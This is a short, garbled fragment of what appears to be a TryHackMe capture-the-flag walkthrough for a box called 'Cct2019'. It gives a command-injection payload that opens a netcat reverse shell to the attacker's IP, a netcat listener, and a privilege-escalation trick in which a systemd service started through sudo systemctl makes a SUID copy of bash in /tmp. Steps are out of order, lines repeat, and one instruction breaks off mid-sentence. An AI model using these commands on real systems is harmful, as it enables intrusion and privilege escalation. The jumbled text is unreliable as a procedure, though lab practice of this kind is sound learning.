Cct2019 Tryhackme May 2026
[Install] WantedBy=multi-user.target
nc -lvnp 4444
127.0.0.1; nc -e /bin/sh <your_ip> 4444 If -e not available, use: cct2019 tryhackme
Run:
Read user.txt :
cat /home/mandy/user.txt Check sudo -l again as mandy – maybe mandy can run something as root.
sudo -u mandy /bin/systemctl link /home/www-data/privesc.service sudo -u mandy /bin/systemctl start privesc.service Now /tmp/bash is a SUID binary. /tmp/bash -p Now you are mandy . [Install] WantedBy=multi-user
[Unit] Description=Privilege escalation [Service] Type=simple User=mandy ExecStart=/bin/bash -c 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash'